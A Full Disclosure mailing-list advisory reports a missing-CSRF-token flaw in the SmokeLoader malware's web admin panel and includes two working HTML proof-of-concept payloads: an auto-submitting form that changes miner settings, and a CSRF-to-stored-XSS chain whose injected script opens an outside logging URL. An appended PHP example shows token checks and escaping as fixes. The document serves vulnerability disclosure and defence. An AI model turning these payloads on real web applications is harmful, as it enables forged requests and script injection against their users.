Message-ID: <CAAHK0WRK-VBH17wT9huuMQ3M65PqGPm=j5h1HLJM+CVmgWf==g@mail.gmail.com>
Date: Mon, 13 May 2024 00:06:06 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Panel.SmokeLoader / Cross Site Request Forgery (CSRF)

Updated and fixed a payload typo and added additional info regarding the
stored persistent XSS; see attached.

Thanks, Malvuln



On Sat, May 11, 2024 at 12:56 AM malvuln <malvuln13@...il.com> wrote:

> Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
> Original source:
> https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txt
> Contact: malvuln13@...il.com
> Media: twitter.com/malvuln
>
> Threat: Panel.SmokeLoader
> Vulnerability: Cross Site Request Forgery (CSRF)
> Family: SmokeLoader
> Type: Web Panel
> MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)
> SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743
> Vuln ID: MVID-2024-0682
> Disclosure: The smokebot admin web panel is written in PHP for remote
> administration capability. The panel has multiple features like Bot List,
> Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP
> page contains an HTML FORM using POST method, however there is no CSRF
> security token used by the FORM. This is a unique token per session within
> the FORM, used as a challenge to the server to help prevent
> cross-site-scripting attacks. Therefore, third-party adversaries who can
> lure a panel user to visit an attacker-controlled webpage or click an
> infected link may result in the panel users submitting FORMS on an
> attacker's behalf. This may result in code execution, data theft, GEO
> location disclosure.
>
>
> Exploit/PoC:
> 1) CSRF to add your own Miner Pool
>
> %3Cform method="post" action="
> http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner
> "%3E
> Pool: %3Cinput type="input" name="miner_pool" size="30"
> value="MyPoolFool:666"%3E
> Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E
> Password: %3Cinput type="input" name="miner_pass" size="20"
> value="malvuln"%3E
> %3Cinput type="hidden" name="mode" value="miner"%3E
> %3Cinput type="submit" value="SAVE"%3E
> %3Cscript%3Edocument.forms[0].submit()%3C/script%3E
> %3C/form%3E
>
> 2) CSRF to XSS
>
> %3Cform method="post" action="
> http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner
> "%3E
> Pool: %3Cinput type="input" name="miner_pool" size="30"
> value=""/%3E%3Cscript%3Ewindow.open('
> https://www.malvuln.com/log.php')%3C/script%3E"%3E
> Login: %3Cinput type="input" name="miner_login" size="20" value=""%3E
> Password: %3Cinput type="input" name="miner_pass" size="20" value=""%3E
> %3Cinput type="hidden" name="mode" value="miner"%3E
> %3Cinput type="submit" value="SAVE"%3E
> %3Cscript%3Edocument.forms[0].submit()%3C/script%3E
> %3C/form%3E
>
>
> Disclaimer: The information contained within this advisory is supplied
> "as-is" with no warranties or guarantees of fitness of use or otherwise.
> Permission is hereby granted for the redistribution of this advisory,
> provided that it is not altered except by reformatting it, and that due
> credit is given. Permission is explicitly given for insertion in
> vulnerability databases and similar, provided that due credit is given to
> the author. The author is not responsible for any misuse of the information
> contained herein and accepts no responsibility for any damage caused by the
> use or misuse of this information. The author prohibits any malicious use
> of security related information or exploits by the author or elsewhere. Do
> not attempt to download Malware samples. The author of this website takes
> no responsibility for any kind of damages occurring from improper Malware
> handling or the downloading of ANY Malware mentioned on this website or
> elsewhere. All content Copyright (c) Malvuln.com (TM).
>

View attachment "4b5fc3a2489985f314b81d35eac3560f_B.txt" of type "text/plain" (3774 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
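For readers who want to see the two defects the advisory describes (a POST form with no anti-CSRF token, and a stored field echoed back unescaped) alongside their standard fixes, the following is an added PHP example. It is not the panel's code and not from the advisory author; the field names (miner_pool, miner_login, mode) follow the PoC, while the handler layout, session key names and page name are assumptions.

```php
<?php
// Added example (not the panel's code): minimal handler for a "miner"
// settings form with a per-session CSRF token and HTML-escaped output.
// Session key names and page name are assumptions for this example.
session_start();

// 1. Per-session CSRF token: generated once, embedded as a hidden input,
//    and compared in constant time before any state change is applied.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_valid(array $post): bool {
    return isset($post['csrf_token'], $_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_valid($_POST)) {
        // A form auto-submitted from a third-party page cannot carry the
        // victim's session token, so the request is rejected here.
        http_response_code(403);
        exit('invalid CSRF token');
    }
    if (($_POST['mode'] ?? '') === 'miner') {
        // Persistence layer omitted; raw values are stored, escaping is
        // applied at output time below.
        $_SESSION['miner'] = [
            'pool'  => (string) ($_POST['miner_pool'] ?? ''),
            'login' => (string) ($_POST['miner_login'] ?? ''),
        ];
    }
}

// 2. Stored XSS fix: escape every stored value when it is placed back into
//    an attribute, so a pool name like "/><script>...</script> stays text.
$pool  = htmlspecialchars($_SESSION['miner']['pool'] ?? '', ENT_QUOTES, 'UTF-8');
$login = htmlspecialchars($_SESSION['miner']['login'] ?? '', ENT_QUOTES, 'UTF-8');
?>
<form method="post" action="control.php?page=miner">
  <input type="hidden" name="csrf_token" value="<?= csrf_token() ?>">
  <input type="hidden" name="mode" value="miner">
  Pool: <input type="text" name="miner_pool" size="30" value="<?= $pool ?>">
  Login: <input type="text" name="miner_login" size="20" value="<?= $login ?>">
  <input type="submit" value="SAVE">
</form>
```

Setting the session cookie with SameSite=Lax or Strict adds a second, browser-enforced layer against cross-origin form posts, but the server-side token check above is the control that does not depend on client behaviour.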
